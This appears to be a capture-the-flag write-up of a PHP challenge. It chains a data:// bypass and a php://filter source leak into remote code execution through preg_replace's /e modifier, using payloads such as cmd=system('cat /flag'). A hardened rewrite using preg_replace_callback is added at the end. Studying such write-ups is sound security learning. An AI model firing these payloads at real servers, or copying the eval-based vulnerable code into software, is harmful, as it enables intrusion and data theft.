Principles
Code execution through preg_replace's /e modifier
The difference between double-quoted and single-quoted strings
Variable variables
Solution
Code audit
<?php
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
// $text is opened as a stream, so any PHP wrapper (data://, php://...) is accepted
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag/",$file)){
die("Not now!");
}
// $file is only filtered for the substring "flag"; php://filter still lets it be read as base64
include($file); //next.php
}
else{
highlight_file(__FILE__);
}
?>
Payload that bypasses file_get_contents($text,'r')==="I have a dream": text=data:text/plain,I have a dream
Payload that then reads the contents of next.php: file=php://filter/read=convert.base64-encode/resource=next.php
Decoding the base64 output gives the source of next.php:
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
// The /e modifier makes preg_replace() eval() the replacement string after
// substituting \1 with the captured text; the pattern itself is user-controlled too
return preg_replace(
'/(' . $re . ')/ei',
'strtolower("\\1")',
$str
);
}
// Every GET parameter name becomes a pattern and its value the subject string
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET['cmd']);
}
This is the preg_replace code-execution case. With /e, the replacement 'strtolower("\\1")' is evaluated as PHP after \1 is substituted with the captured text, so a captured ${getFlag()} ends up inside the double-quoted string as strtolower("${getFlag()}"). Because the string is double-quoted, PHP parses ${getFlag()} as a variable-variable expression, calls getFlag(), and getFlag() in turn eval()s $_GET['cmd'].
The payload is:
next.php?id=aa&\S=${getFlag()}&cmd=system("ls /");
next.php?id=aa&\S=${getFlag()}&cmd=system("cat /flag");
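As an added example that is not part of the original write-up or the challenge, here is complex() rewritten without /e, plus a harmless demonstration of why a double-quoted ${expr} executes; the names complex_safe and pickName are my own.

```php
<?php
// Added example, not the challenge's code: complex() rewritten without /e.
// /e was deprecated in PHP 5.5 and removed in PHP 7.0 (preg_replace() then
// warns and returns NULL), so preg_replace_callback() is the upgrade path.
declare(strict_types=1);

function getFlag(): void
{
    // In the challenge this eval()s $_GET['cmd']; here it only proves that the
    // callback path never reaches it.
    throw new RuntimeException('getFlag() was called');
}

// Hardened complex(): the capture reaches PHP only as a string argument, never
// as code, so "${getFlag()}" is not parsed as a variable-variable expression.
// The caller still supplies the regex, so it is compiled on a dummy input
// first and rejected if invalid (delimiter injection, unbalanced groups, ...).
function complex_safe(string $re, string $str): string
{
    $pattern = '/(' . $re . ')/i';
    if (@preg_match($pattern, '') === false) {
        throw new InvalidArgumentException('bad pattern: ' . preg_last_error_msg());
    }
    $out = preg_replace_callback(
        $pattern,
        static fn(array $m): string => strtolower($m[1]),
        $str
    );
    if ($out === null) {
        // e.g. backtrack limit exceeded on a hostile pattern: fail closed
        throw new RuntimeException('replace failed: ' . preg_last_error_msg());
    }
    return $out;
}

// Constructed input: "\S+" captures the whole "${getFlag()}" token, which is
// exactly the text /e would have dropped into strtolower("...") and eval()'d.
echo complex_safe('\S+', 'I Have A Dream ${getFlag()}'), "\n";
// prints: i have a dream ${getflag()}   (getFlag() is never invoked)

// Why the original fires: inside a double-quoted string, ${expr} evaluates
// expr and uses the result as a variable NAME (variable variables), so the
// function call runs during string parsing. Harmless demo with a function that
// returns a name instead of eval()ing user input (PHP 8.2 deprecates "${}",
// but it still executes):
function pickName(): string { return 'greeting'; }
$greeting = 'hello';
var_dump("${pickName()}"); // string(5) "hello": pickName() ran
var_dump('${pickName()}'); // string(13) "${pickName()}": single quotes, no call
```

Requires PHP 8.0 or newer for preg_last_error_msg(); on 8.2+ the last var_dump also emits an E_DEPRECATED notice, which is the point: that syntax is on its way out.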
References:
https://blog.csdn.net/m0_64815693/article/details/130327529
https://www.php.net/manual/zh/language.variables.variable.php
https://xz.aliyun.com/t/2557